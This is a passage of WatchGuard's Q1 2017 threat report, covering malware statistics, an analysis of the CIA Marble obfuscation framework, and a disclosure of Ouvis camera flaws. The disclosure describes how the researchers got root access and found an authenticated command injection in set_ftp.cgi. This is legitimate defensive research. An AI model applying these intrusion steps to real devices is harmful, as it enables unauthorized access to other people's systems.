mutual historical ancestry, these countries have
little in common.
EMEA
63.3%APAC
4.7%
Americas
32%
46% of JavaScript Obfuscation in EKs
were found in the U.S.
of the tnftp attacks are split between Great Britain (42.6%) and Australia (31%).
Figure 8: Malware detection by region
73.6%
Internet Security Report: Q1 2017 • 19
of the malicious
JavaScript we saw
arrived in email.
Network Attack Trends
Though some attacks are global, others target var-
ious countries differently. You can learn a lot from
this regional nuance. For instance, our data shows
that if you live in North America, you should look
out for web-based attacks and drive-by download
campaigns that leverage malicious exploit kits.
Meanwhile, if you’re in Spain, beware of XSS attacks,
and train your users to avoid clicking suspicious links.
Finally, if you live in the UK or Australia, be sure you
have updated tnftp.
• Malicious JavaScript primarily arrives in emails.
Like the previous quarter, we saw a significant
amount of malicious JavaScript in Q1. JavaScript
was designed for the web, so you might expect
to encounter it more there. However, we saw
more malicious JavaScript in email. Though
attackers do exploit malicious JavaScript with
their web-based EKs, 97.2% of the malicious
JavaScript we saw arrived in email. These
evil emails tend to include compressed Zip
attachments, which hide malicious .JS files. As
mentioned in the last report, this is a common
delivery vector for ransomware like Locky.
• Linux malware is sent over the web. In our
Malware Trends section, we mentioned that we
saw a lot of Linux-based threats in Q1. These
Linux threats were overwhelmingly delivered over
the web (99.99%), with only eight of the 419,367
instances arriving via email or FTP. This makes
sense if you think about how automated Linux
and IoT bots work. As seen in the screenshot
sample above, many malicious Linux scripts
simply use the “wget” command to grab other
malicious tools over an everyday web connection.
• Brazilian banking attack sends malicious Java
over email. Like JavaScript, Java is one of the
things you might expect to see more over the
web. However, 99.9% of the Java/Downloader
malware arrived over email. As mentioned before,
this attack occurred almost exclusively in Brazil,
which suggests this malware is associated with a
well-known attack campaign targeting Brazilian
banks. The attackers behind that campaign
send phishing emails that contain malicious .Jar
files; sometimes directly attached to the email,
but also often compressed within a Zip file.
The attackers use a malicious Java downloader
because it allows them to target both PCs and
Macs.
• The Bitcoin mining trojan was entirely delivered
via FTP. As mentioned earlier, Generic36.AAVT is
associated with Bitcoin mining trojans. This threat
was the only malware to buck the trend, and
not get delivered over email or the web. It was
almost exclusively FTP-based, with 1 exception
out of 77,704 instances. We’re not entirely sure
why this is; however, many traditional bots did
use FTP to download additional payloads. We
theorize that this could be another threat adding
a bitcoin miner
to a victim’s
computer as
a secondary
payload.
Internet Security Report: Q1 2017 • 19
97.2%
Internet Security Report: Q1 2017 • 20
Network Attack Trends
1
2
3
Firebox Feed Statistics Defense LearningsWe’ve shared several small defensive tips throughout this
section, but here are three defense strategies for some of the
top-level trends identified by Q1’s Firebox Feed data:
Harden your Linux servers and IoT devices.
Three, if not four (if you include PERL/
ShellBot) of the top ten Q1 malware variants
target Linux systems. We suspect this
increase comes from attackers launching
automated attacks against weak IoT devices.
Manufacturers focusing on usability and
affordability over security have released a huge
number of incredibly unsecure IoT devices
to the masses. Consumers with little security
knowledge often connect these devices to
the Internet without any firewall, allowing
attackers easy access. Open Telnet and SSH
combined with weak passwords allow attackers
to quickly infect swaths of hosts. At the very
least, we recommend you firewall your IoT
devices and Linux servers from the Internet.
Avoid opening access to command line
interfaces without additional authentication
or security mechanisms like VPN. Change your
default passwords and update your software or
firmware as often as possible.
The web battleground has shifted towards servers.
In Q4, we saw many browser-based attacks. However,
this quarter we saw more web server attacks. Spend
some time hardening your web servers, and don’t
forget any other services with web-based interfaces.
Hardening servers involves locking down permissions,
limiting resource exposure, and making sure the
server’s software is fully patched. You should also
audit your web applications for programmatic
vulnerabilities. Web application security is a complex
topic, but we recommend you visit OWASP.org for a
wealth of practical tips.
Traditional AV misses 38% of malware.
For the second quarter in a row, we have seen our legacy AV solution miss a lot of
malware that our more advanced solution can catch. In fact, it has gone up from 30% to
38%. Nowadays, cyber criminals use many subtle tricks to repack their malware so that
it evades signature-based detection. If you want to block most malware, you need to
deploy an advanced malware solution. These anti-malware solutions can often detect
never-before-seen zero day malware using more proactive detection techniques, such as
behavior analysis and machine learning. If you’re a WatchGuard customer, APT Blocker
catches the malware that traditional AV misses. If you don’t have an advanced malware
solution, you’ll likely miss more than one third of threats online.
Internet Security Report: Q1 2017 • 22
Top Security Incidents
Our goal with this section of the report is to introduce new research and technical detail that you didn’t
already hear from the news, or other research sources. This quarter, we cover the Marble framework from
the CIA Vault 7 leaks.
The CIA Vault 7 LeaksOn March 7, 2017, WikiLeaks began releasing a series of leaks from the U.S. Central Intelligence Agency (CIA)
code-named “Vault 7.” The initial leak included descriptions and details of the CIA’s covert hacking program,
including stockpiles of zero day exploits. The exploits targeted unpatched vulnerabilities in Android and iPhone
devices, Smart TVs, and traditional desktop and server operating systems like Windows, OS X, and Linux.
While the leaks contained many details for ongoing CIA projects, WikiLeaks consciously held back actual
source code and proof of concept (POC) exploits from the public, instead offering to share them with affected
manufacturers for analysis.
Two weeks after the first Vault 7 leak, WikiLeaks published a second release titled Dark Matter. The Dark Matter
release disclosed several rootkit tools the CIA used to gain persistence on Apple computers by infecting the
firmware. The leak included the user manual for a modified Thunderbolt-to-Ethernet adapter, code-named the
“Sonic Screwdriver,” capable of bypassing EFI/UEFI protections on the target host to facilitate installation of
the rootkit. Dark Matter also disclosed similar tools for infecting Apple’s iOS mobile operating system, dating
back to 2008.
For sophisticated hackers, covering your tracks is one of the most important parts of an attack. Stealing
sensitive information does you no good if investigators can clearly trace the attack back to you. The act of
investigating an attack, and analyzing its artifacts is called computer forensics. On March 31, WikiLeaks contin-
ued their “Vault 7” leaks with the release of the CIA’s anti-forensics tool, called the Marble framework. The leak
included the Marble’s source code and user documentation.
A Technical Analysis of the Marble FrameworkWhen malware authors write source code, they often include strings of text along with the regular compu-
tational instructions. Such strings can include file paths, Windows registry key names, and sometimes even
hard-coded words or passwords. When they compile their source, these strings remain present in the execut-
able, for anyone to find.
When analyzing malware, forensic investigators usually first check executables for any human-readable strings,
which may provide clues about the malware and its origins. The CIA primarily designed the Marble framework
to obfuscate these strings of text, in hopes of preventing investigators from linking CIA malware to a specific
developer (i.e. the CIA).
Top Security IncidentsEvery quarter, several major security stories make the headlines. Some of
these stories involve well-known products or services, or simply have a major
effect on the security of the overall industry. The media does a great job
informing the public of these issues, but they don’t always dig into, or
research, the technical details.
Internet Security Report: Q1 2017 • 23
Top Security Incidents
The framework includes several modules with different purposes. The Mibster module looks for strings marked
for obfuscation and performs the actual scrambling. The Validator module checks the compiled executable file
and confirms that all the marked strings were successfully scrambled. Finally, the Mender module reverts the
source code back to its original state in the event of an error, or if manually requested by the malware author.
To understand the Marble framework, you must first understand how programming languages like C and C++
store strings of text. If you were developing a new ransomware variant, you probably would want to include
a function that creates a text file with a ransom note on the victim’s desktop. You might include the string of
text, “YOUR FILES ARE ENCRYPTED”, inside this text file. In order for your ransomware to create that note, it
would have to include that string of text in its source code.
C and C++ store string variables as an array of individual characters, terminated by a null byte
(C++ also includes a variable data type specifically for strings, which we’ll ignore).
Figure 9: String as character array storage example
Each character in the character array takes up 8-bits or 1-byte of memory, which is large enough to store any
letter in the English alphabet. Other written languages, such as Cyrillic, require multiple bytes for each char-
acter. The wchar_t (wide character) data type allows C and C++ to use 16-bits or 2-bytes of storage for each
character. To store the Russian string “шифровать” (roughly “encrypt” in English),
we would use an array of wide characters.
Figure 10: String as wide-character array storage example
The Marble framework defines two new data types for string storage. The “CARBLE” data type is 1-byte long
and matches up to the original “char” data type, while the “WARBLE” data type is 2-bytes long and matches
up to the original “wchar_t” data type. Strings that are defined using the new CARBLE and WARBLE data
types are obfuscated by the framework when the source code is compiled into an executable.
Figure 11: Marble framework new string storage data types
When using the Marble framework, a malware author first chooses which of the different obfuscation algo-
rithms – or “Marbles” as the CIA calls them – they wish to use. The framework contains 106 different algorithms
by default, 48 using C++ and 58 using C. The documentation also includes instructions for adding additional
algorithms.
After selecting the pool of obfuscation algorithms, the malware author adds the framework to their project,
and includes instructions for the compiler to run Mibster (the obfuscation module) during compilation. Now
the malware developer can use the newly defined CARBLE and WARBLE data types to flag strings for obfus-
cation by Mibster.
Internet Security Report: Q1 2017 • 24
When the malware author compiles their code, Mibster choses an obfuscation algorithm from the pool, and
then notes all the source files containing the CARBLE and WARBLE data types. It creates a “gold copy”
(un-modified) of those files to safely revert to the originals in case of an error during obfuscation.
Next, Mibster parses these files, looking for strings using the CARBLE and WARBLE data types. When it
locates them, it scrambles the string using the chosen obfuscation algorithms. It replaces the original with a
newly scrambled string and an additional de-obfuscation code. The de-obfuscation code allows the compiled
executable (malware) to retrieve the original string when it needs it.
After Mibster completes the obfuscation process, the framework validates the output to confirm all the marked
strings were scrambled. If it encounters any errors, the Mender module reverts the source code back to its
original (using the gold copy files).
In the end, the Marble framework scrambles all the human-readable strings within an executable, making it
difficult for a forensic investigator to learn anything about the author from these strings.
Marble Obfuscation Algorithms As for the obfuscation algorithms themselves, each algorithm generates a random key of different sizes
depending on the algorithm used.
Figure 12: Obfuscation random key generation
As Mibster feeds a string through the algorithm, it modifies each character using a character from the key.
The modification either adds or subtracts the value of the key with the character being modified (bumping),
or XORs it (Exclusive OR).
Figure 13: Obfsucation XOR algorithm
As mentioned before, the de-obfuscation code is the internal mechanism that allows the compiled execut-
able to read an obfuscated string by returning in to its original state while the program is running. One other
difference between the available algorithms is how they implement this de-obfuscation code. Some place the
de-obfuscation code alongside the scrambled string as a computational loop, others call a separate function
stored elsewhere in the executable.
Figure 14: De-obfuscation code generation
Top Security Incidents
Top Security Incidents
The leaked Marble framework is a fairly complex tool used to throw off savvy forensic investigators, not normal
users. However, the average administrator can still draw out a few defensive learnings from this example.
Marble Framework Defense Learnings
Obfuscation can also help malware hide from detection
There’s a big difference between executable code obfuscation and anti-forensic string obfuscation.
The Marble framework provides the latter, and doesn’t really help malware evade detection. It just
makes it harder for investigators to attribute the malware. That said, this incident reminds us that
criminal attackers also use code obfuscation similarly to hide malware from antivirus (AV) software.
Signature-based AV solutions looking for certain code patterns won’t find them if the code is
obfuscated. This highlights the necessity for more advanced malware detection solutions, such as
behavior-based sandboxes, to detect obfuscated malware.
Beware of false flag attacks in nation-state attacks
The user documentation released in the Vault 7 leak confirms that the Marble
obfuscation tools support foreign languages. This suggests that the CIA could
leverage this tool to obfuscate their malware to appear like it comes from another
country; something experts call a false flag attack. While there is no direct evidence
that supports the CIA used Marble in this way, you should be aware of the possibility.
Expect false flags to trickle down to criminal malware
More importantly, be aware that the release of the Marble framework now enables even
unsophisticated criminals to obfuscate their malware in a way that could be falsely attributed
to the CIA. Malware authors could even backdate the compile timestamp to make their malware
appear as though it was created before the public release of the framework. We expect some
criminal malware to start using string obfuscation to throw off investigators.
1
2
3
Internet Security Report: Q1 2017 • 25
WatchGuard Threat Lab’s IoT Research Project
Internet Security Report: Q1 2017 • 27
WatchGuard Threat Lab’s IoT Research Projects
In response to the rapid spread of the Mirai botnet, and the perceived general
insecurity of new consumer IoT devices, WatchGuard’s Threat Lab launched
an ongoing project to analyze various IoT devices for security flaws. Some
of our test targets included Wi-Fi cameras, fitness accessories, and even a
wireless egg tray. Any security flaws our researchers find are responsibly
disclosed to device manufacturers for patching. Furthermore, we wait 90
days before full disclosure in the event that vendors don’t respond to our
disclosure notice.
In this report, we finally share some zero day vulnerabilities that were discovered in early January. Since the vendor did not respond to our researcher’s disclosure, we had to wait the full 90 days before sharing these details.Ouvis C2 HD Security Camera
Responsible Disclosure: Ouvis C2 HD Security Camera
As a part of our ongoing IoT vulnerability research project, one of the
recently tested devices included the Ouvis C2 HD Wireless Security Camera.
This is a wireless camera that includes Android, iOS and browser-based
remote viewing.
Open Telnet Access
When first examining new network devices for vulnerabilities, researchers
typically start by port scanning the device to identify any open services.
Figure 15: nmap port scan output
Internet Security Report: Q1 2017 • 28
WatchGuard Threat Lab’s IoT Research Project
A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a
non-standard port for web servers. We immediately noted the open Telnet access as a potential security vulnerability,
since Telnet offers no encryption. There is no reason for consumer IoT devices to allow Telnet-based management
access, especially when more secure options like SSH exist. Malicious applications like the Mirai botnet thrive because
of open Telnet access combined with weak default passphrases.
After detecting an open Telnet port, a penetration (pen) tester typically tries to obtain privileged command-line
access to the device through Telnet. To gain such access, the pen tester needs to figure out the username and
password for the ‘root’ account on the device. Since these CLI interfaces are often left in for diagnostic purposes,
manufacturers don’t share credentials for them, and don’t necessarily intend them for the customer’s use.
Brute forcing to the rescue. In respect to authentication, a brute force attack is the act of rapidly trying different
username and password combinations against a login. Using an application called THC Hydra, our researcher at-
tempted to brute force the credentials for the device. To speed up the attack, he configured Hydra to use a wordlist
containing thousands of common passphrases. After several hours of trying different username name and password
combinations, Hydra was unable to find working credentials.
After failing to brute force credentials, the threat research team was forced to find other methods for obtaining root
access. The next step involved disassembling the camera in search of console serial access. Luckily, one of the circuit
boards in the camera had UART pads.
Figure 16: hydra password brute force via
Figure 17: Empty UART pads
Internet Security Report: Q1 2017 • 29
WatchGuard Threat Lab’s IoT Research Project
After soldering a USB-TTY to UART cable to the empty pads, the team could access the camera’s
serial console (115200 baud rate).
Figure 18: Camera U-Boot output
Figure 19: Modifying the U-Boot configuration
Figure 20: Hashed root password
After halting the boot process, our researcher modified the U-Boot configuration to initialize a shell after
mounting the filesystem.
Our researcher was finally greeted with a command line shell for the camera. Once connected,
he checked /etc/passwd for any user accounts and easily found the root account and its hashed password.
Summary
Internet Security Report: Q1 2017 • 30
Access to a password hash allows for faster, more efficient offline password cracking. In one last attempt to obtain the
root password, our team fed the passwd file through hashcat, a popular hash cracking application. After several days of
cracking, attempting every possible character combination up to and including eight characters, hashcat failed to yield
any results.
We still consider this open Telnet access a weakness, especially since the device includes a hard-coded root password
(which some might call a backdoor account). The good news is the root password has withstood several significant
cracking attempts so far. It seems the device manufacturer was at least conscious enough to use a strong password.
That said, if anyone ever recovers this password, it could provide a backdoor to all these devices. In fact, we have since
correlated with other researchers’ analysis, and have confirmed that all these Ouvis cameras share the same root pass-
word hash. If the password ever leaks, it will provide attackers with unrestricted access to these devices.
Authenticated Remote Code Execution VulnerabilityIn auditing IoT devices like webcams, our research team frequently finds web application flaws in web management
portals due to un-sanitized inputs. After finding a remote code execution vulnerability in one of the web management
pages of a similar IoT camera, the team checked the same location (FTP backup settings) for this Ouvis camera, and
found the exact same vulnerability (see our Q4 report for more details on the previous issue).
Figure 21: Hashed root password
A packet capture of DNS traffic from the camera showed an attempted name resolution for ‘rce.bad’, confirming the
remote code execution vulnerability.
As it turned out, the Common Gateway Interface (CGI) handler for FTP configuration (set_ftp.cgi) did not sanitize
the user input before saving it to an FTP upload script located at /tmp/ftpupload.sh. The camera runs this script as a
privileged user, which in turn executes any command an attacker injects into this un-sanitized input (in our example, the
ping command).
This serious vulnerability could allow attackers to execute any command on this camera as root, thus elevating their
privileges. However, this is an “authenticated” vulnerability, meaning the attacker must already have valid management
credentials in order to exploit this flaw.
ConclusionAfter confirming both vulnerabilities, our researchers immediately submitted a report to Ouvis via their support contact.
Ouvis did not respond to our disclosure attempts over a 90-day period.
After 60 days, a separate researcher disclosed the same, and further vulnerabilities in a series of cameras appearing
to be manufactured by the same OEM supplier. Because the Ouvis C2 was not present in Pierre Kim’s list of affected
models, we continued the originally planned 90-day disclosure period. After no contact from the vendor, we responsibly
disclosed this research publicly on April 24, 2017.
Timeline
• 2 January 2017 – Vulnerabilities discovered
• 4 January 2017 – Reported to manufacturer
• 3 February 2017 – Manufacturer contacted a second time
• 6 March 2017 – Manufacturer informed of imminent public disclosure
• 8 March 2017 – Similar vulnerabilities zero day’d by Pierre Kim
• 3 April 2017 – Manufacturer contacted a final time
• 24 April 2017 – Public Disclosure
Internet Security Report: Q1 2017 • 31
WatchGuard Threat Lab’s IoT Research Project
Avoid exposing CLI management interfaces to the InternetMost IoT devices have no legitimate
need for CLI access via Telnet or
SSH. If you port scan your IoT device
and find open CLI access, take extra
caution while deploying it. Implement
network firewall rules to block inbound
Telnet and SSH access not only from
the Internet, but from other internal
networks as well (to prevent attack
pivoting).Avoid IoT devices with hard-coded backdoor accounts Some manufacturers ship IoT devices with
set accounts that have the same hard-cod-
ed password for all devices. If consumers
are unaware of the account, it’s essential-
ly a backdoor. Before purchasing an IoT
device, research the manufacturer’s history
in securing their products. Avoid vendors
that are known to include hard-coded
backdoor accounts in their IoT devices.
Change default passwordsIoT manufacturers often hardcode
weak or non-existent passwords to
make their products easier to use (at
the risk of security). When first setting
up a new IoT device your first task
should be setting new, difficult-to-
guess passwords wherever possible.
12
3
WatchGuard Threat Lab’s Research Defense Learnings
Our research shows consumer IoT devices continue to ship with weaknesses and security vulnerabilities. At
best, these issues could result in loss of privacy for consumers. At worst, they might allow attackers to take
over these devices, gaining a foothold into your internal network.
Consumers should take steps to secure the IoT devices they purchase, as well as urge device manufacturers to
focus on security. At a minimum, here are three IoT defense strategies that help.
Internet Security Report: Q1 2017 • 33
One lesson you learn if you follow any trend over time is things change.
Sometimes they change at a glacial pace, so slowly that you may not notice the
alterations. Other times they change overnight, so quickly that you can’t get your
bearings straight. This constant change applies directly to the threat and security
landscape as well.
Defense Highlights
Conclusion & Defense Highlights
Macro malware – a top threat from Q4 2016 – dropped of our list, becoming less relevant in Q1. Meanwhile, we saw three times as much Linux malware as we did before, suggesting attackers have increased their efforts to target IoT.
This quarter, we saw some of the same malware and
network attacks retain their place on our top threat
lists. However, we also saw new threats and exploits
replace the old ones. For instance, macro malware
– a top threat from Q4 2016 – dropped off our list,
becoming less relevant in Q1. Meanwhile, we saw
three times as much Linux malware as we did before,
suggesting attackers have increased their efforts to
target IoT.
When change happens unexpectedly, it feels scary,
and can cause unforeseen surprises that hurt when
they hit you unprepared. However, change doesn’t
have to be scary. In fact, when you vigilantly monitor
change, you can adapt and prepare for it, protecting
yourself from unanticipated consequences.
That’s the whole point of this quarterly security
report – to prepare you for change in the threat
landscape. By staying current with the latest threat
trends, you can adapt your technical and social se-
curity strategies to defend against evolving threats.
Throughout this report, we shared detailed defense
lessons for the individual trends we identified. We’ll
end with a few final high-level defense strategies
every organization should consider.
Defense Highlights
Internet Security Report: Q1 2017 • 34
Basic security policies still block many threats
Security experts often spend much of their time talking about the most sophisticated
threats. We get excited about new zero day exploits, the latest kernel rootkits, and other
never-before-seen attacks and evasion techniques. From a security expert’s perspec-
tive, it makes sense to focus on the more interesting, advanced threats, which will surely
become more common in the future. However, our data shows that the top threats
aren’t always new or sophisticated. In fact, most of the popular network attacks we saw
this quarter exploited old vulnerabilities that were patched long ago. Many of the top
malware samples we identified were well-known examples, which attackers have used
for years. Even the vulnerabilities we found in IoT devices were very standard weakness-
es that have simple solutions. The point is, you can prevent a significant slice of these
threats just by following some basic security practices. Patch your software often. Avoid
opening unsolicited files, or clicking unexpected links. Firewall your IoT devices. These
simple practices still do help.
Basic firewalls are incomplete without other security layersFirewalls remain a critical part of our security infrastructure. You must limit the network
services you expose to the Internet (as proven with unsecure IoT devices). However, a
firewall alone is not enough. Today, most attacks don’t target exposed services directly,
but rather target your users instead. Even with a firewall, almost all organizations open
holes allowing their users to reach the web, get email, or transfer files (among other
things). To protect against today’s client-side attacks, you must also implement a suite
of security services, such as intrusion prevention, anti-malware, IP and URL filtering,
and more to monitor the services you allow through your firewall for malicious activity.
If you don’t yet have a layered security strategy, consider a unified threat management
platform that combines basic firewalling with many other layers of protection.
Segment and harden your IoT devices
In the current state of the industry, IoT devices can’t yet be trusted. While there are
certainly exceptions, our research, as well as other industry research, suggests the vast
majority of IoT devices have major security weaknesses, and can pose a threat to the
rest of your network. You might presume criminals don’t care about your webcams,
refrigerators, or DVRS, but attackers known they can use these local devices to reach
more important computers in your network. Since manufacturers are shipping these
devices with vulnerabilities, it’s up to you to secure them. First, firewall IoT devices from
the Internet and only expose necessary services. In fact, we recommend you segment
them on your internal network, too. That way if someone hijacks your IoT device, they
don’t immediately gain access to everything else. Finally, remember to change default
passwords, disable unnecessary services, and patch these products as often as possible.
Invest in advanced malware prevention
We said it last quarter, and it remains true this quarter; if you don’t have an advanced
malware protection solution, you will eventually get infected. While many of the threats
we see are well known, it’s clear attackers regularly repackage their old malware to
evade pattern-based detection. This quarter we learned that 38% – over one third – of
the malware we detected got past legacy signature-based AV solutions. The industry
has long understood the weakness in reactive, pattern-based AV, but this problem has
reached a critical mass. More and more victims are getting infected with threats like
ransomware despite having basic protection. To catch today’s more evasive malware,
you need solutions that use more proactive detection techniques, such as behavioral
analysis, or machine learning and big data analytics. We recommend you invest in an
advanced malware solution. If you’re a WatchGuard customers, our APT Blocker and
Threat Detection and Response offerings provide this service.
Summary
If you made it this far, thank you for reading our report to the end. We hope you found the trends and analysis
enlightening, and use these learnings to protect your networks and organizations. Feel free to share any feed-
back you have about the report with [email protected], and join us next quarter.
About WatchGuard Threat Lab
WatchGuard’s Threat Lab (previously the LiveSecurity Threat Team) is a group of dedicated threat researchers
committed to discovering and studying the latest malware and Internet attacks. The Threat Lab team analyzes
data from WatchGuard’s Firebox Feed, internal and partner threat intelligence, and a research honeynet, to
provide insightful analysis about the top threats on the Internet. Their smart, practical security advice will
enable you to better protect your organization in the ever-changing threat landscape.
About WatchGuard Technologies
WatchGuard® Technologies, Inc. is a global leader in network security, providing best-in-class Unified Threat
Management, Next Generation Firewall, secure Wi-Fi, and network intelligence products and services to more
than 80,000 customers worldwide. The company’s mission is to make enterprise-grade security accessible
to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for distributed
enterprises and SMBs. WatchGuard is headquartered in Seattle, Washington, with offices throughout North
America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
For additional information, promotions and updates, follow WatchGuard on Twitter @WatchGuard, on
Facebook, and on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information
about the latest threats and how to cope with them at www.secplicity.org.
Corey Nachreiner
Chief Technology Officer
Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard’s
technology vision and direction. Previously, he was the director of strategy and
research at WatchGuard. Nachreiner has operated at the frontline of cyber security
for 16 years, and for nearly a decade has been evaluating and making accurate
predictions about information security trends. As an authority on network security
and internationally quoted commentator, Nachreiner’s expertise and ability to dissect
complex security topics make him a sought-after speaker at forums such as Gartner,
Infosec and RSA. He is also a regular contributor to leading publications including
CNET, Dark Reading, eWeek, Help Net Security, Information Week and Infosecurity,
and delivers WatchGuard’s “Daily Security Byte” video on Facebook.
Marc Laliberte Security Threat Analyst Specializing in network security technologies, Marc’s industry experience allows him
to conduct meaningful information security research and educate audiences on the
latest cyber security trends and best practices. With speaking appearances at IT
conferences and regular contributions to online IT and security publications, Marc is
a security expert who enjoys providing unique insights and guidance to all levels of
IT personnel.
© 2017 WatchGuard Technologies, Inc. All rights reserved. WatchGuard, the WatchGuard logo, LiveSecurity, and Firebox are registered trademarks of WatchGuard Technologies, Inc. in the United States and/or other countries. All other tradenames are the property of their respective owners. Part No. WGCE67003_062017
Top Related